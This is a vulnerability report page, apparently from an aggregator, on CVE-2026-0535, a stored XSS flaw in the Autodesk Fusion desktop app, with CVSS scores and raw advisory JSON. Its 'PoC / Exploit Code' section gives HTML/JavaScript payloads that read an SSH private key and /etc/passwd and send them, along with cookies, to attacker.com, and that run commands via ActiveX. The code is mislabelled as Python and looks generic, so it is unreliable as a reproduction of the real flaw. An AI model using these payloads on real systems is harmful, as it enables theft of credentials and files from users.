Security Vulnerability Report
中文
CVE-2026-0535 CVSS 7.1 HIGH

CVE-2026-0535

Published: 2026-01-22 17:16:30
Last Modified: 2026-01-30 17:07:50

Description

A maliciously crafted HTML payload, stored in a component’s description and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:* - VULNERABLE
Autodesk Fusion 桌面应用程序(具体版本待官方披露)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Malicious HTML payload for CVE-2026-0535 --> <!-- This PoC demonstrates the stored XSS vulnerability in Autodesk Fusion --> <!-- Step 1: Create a malicious component description --> <script> // Read local files using XMLHttpRequest var fileContent = ''; var xhr = new XMLHttpRequest(); xhr.open('GET', 'file:///C:/Users/Admin/.ssh/id_rsa', false); xhr.send(); if (xhr.status === 200) { fileContent = xhr.responseText; // Exfiltrate the file content fetch('https://attacker.com/steal?data=' + encodeURIComponent(fileContent)); } </script> <!-- Alternative payload using img onerror --> <img src=x onerror="this.src='http://attacker.com/log?c='+document.cookie;fetch('file:///etc/passwd').then(r=>r.text()).then(d=>fetch('http://attacker.com/exfil?d='+btoa(d)))"> <!-- Payload to execute arbitrary code --> <script> // Execute code via ActiveXObject (Windows) try { var shell = new ActiveXObject('WScript.Shell'); shell.Run('calc.exe'); // Or any malicious command } catch(e) {} </script> <!-- Note: For defense purposes only. Use in authorized testing environments. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0535", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:30.260", "lastModified": "2026-01-30T17:07:49.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A maliciously crafted HTML payload, stored in a component’s description and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process."}, {"lang": "es", "value": "Una carga útil HTML creada maliciosamente, almacenada en la descripción de un componente y en la que un usuario hace clic, puede desencadenar una vulnerabilidad de cross-site scripting (XSS) almacenado en la aplicación de escritorio Autodesk Fusion. Un actor malicioso puede aprovechar esta vulnerabilidad para leer archivos locales o ejecutar código arbitrario en el contexto del proceso actual."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:*", "versionEndExcluding": "2606.1.21", "matchCriteriaId": "00476C10-FCC9-4EDD-AE74-95A8E99806B9"}]}]}], "references": [{"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}